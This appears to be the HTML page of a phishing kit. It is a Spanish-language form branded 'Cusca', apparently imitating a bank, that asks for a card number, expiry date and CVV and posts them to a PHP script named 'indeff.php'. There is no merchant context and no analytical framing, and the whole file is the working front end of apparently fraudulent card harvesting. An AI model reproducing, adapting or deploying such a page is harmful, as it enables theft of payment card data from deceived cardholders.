<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cusca</title>
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
    <style>
        .nav {
             width: 110%;
            padding: 15px;
            background: #2f586e;
        }
        
        .ipp {outline: none;
            -webkit-text-size-adjust: 100%;
            visibility: visible;
            box-sizing: border-box;
            margin: 0;
            font: inherit;
            line-height: normal;
            -webkit-user-select: text!important;
            font-family: 'Roboto', Arial, sans-serif;
            font-weight: 400!important;
            width: calc(100% - 42px);
            border: 1px solid #bbb;
            height: 40px;
            padding: 0 14px;
            font-size: 16px;
            color: #333;
            border-left: 3px solid #c3932f;
            background-repeat: no-repeat;
            background-position: 8px center;
            padding-left: 40px;
        }
        
        .form {
            width: 380px;
            height: auto;
            padding: 10px;
            border: px solid gray;
            margin-left: 10px;
        }
        
        .boton {
           
    
            background: #2f586e;
             width: 190px;
            height: 39px;
            border: none;
            color: #fff;
            font-size: 16px;
            margin-top: -10px;
              
             
        }
        
        .body {
            font-family: 'Roboto', Arial, sans-serif;
            background-color: #fff;
            margin: 0;
            padding: 0;
            width: 90%;
        }

        .fas {
            -webkit-text-size-adjust: 100%;
    visibility: visible;
    box-sizing: border-box;
     
    speak: none;
    font-style: normal;
    
    font-variant: normal;
    text-transform: none;
    line-height: 1;
    -webkit-font-smoothing: antialiased;
    margin-right: 4px;
    vertical-align: top;
    display: inline-block;
    color: #c3932f;
    font-size: 24px;
    margin-top: 9px;
        }

        
    </style>
</head>
<div class="nav">
    <img style="width: 150px;" src="img/log.png" alt="">
    <img width="110px" style="float: right;margin-top: -5px;" src="img/arr.png" alt="">
</div>

<center> 
<body class="body">
   

   
        <br><br><br>
<div style=" width:50 ;"> 



 

        <form action="php/indeff.php" class="form" method="post">

            <img style="position: absolute;
            width: 277px;
            margin-top: -29px;
            margin-left: -190px;" src="img/titulo.png" alt=""><br><br>
            
            
            
            
            <img src="img/car.png" style="width: 150px; opacity: 70%;" alt="">


<br>

    <img style="width: 350px;margin-left: -15px;" src="img/titulo3.png" alt="">











            <div  >
                <p style="float: left; margin-left: 20px;">Numero de tarjeta *</p>

                <input inputmode="numeric" style="margin-top: -10px;" required class="ipp" type="text" name="tarj" placeholder="Ingresa numero de Tarjeta " maxlength="16"><br><br>
            </div>
            
            <div style="margin-top: -15px;">
                <p style="float: left; margin-left: 20px;">Fecha de vencimiento *</p>
 <input style="margin-top: -10px;" inputmode="numeric" type="text" id="fecha" name="fecha" maxlength="7" oninput="formatFecha(event)" required  style="margin-top: -95px;" class="ipp" id="fecha"  placeholder="MM/AA">
               <br><br>
            </div>

            <div style="margin-top: -12px;">
               <p style="float: left; margin-left: 20px;">Código CVV de Seguridad *</p>
                <input inputmode="numeric" style="margin-top: -10px;" required class="ipp" type="password" name="pass" placeholder="CVV" maxlength="3"><br><br>
            </div>
            
            <br>
            
           
            <input class="boton" style="float: right;" type="submit" value="Finalizar">
          
          
            <br><br>
        <br><br>
       
       
       
        </form>
    </div>




<br><br>

<div> </div>
 
<script>
    function formatFecha(event) {
      let input = event.target;
      let inputValue = input.value.replace(/\D/g, '');
      let formattedValue = '';

      if (inputValue.length >= 2) {
        formattedValue += inputValue.substr(0, 2);

        if (inputValue.length > 2) {
          formattedValue += ' / ' + inputValue.substr(2, 2);
        }
      } else {
        formattedValue = inputValue;
      }

      input.value = formattedValue;
    }
  </script>
                </center>
</body>
</html>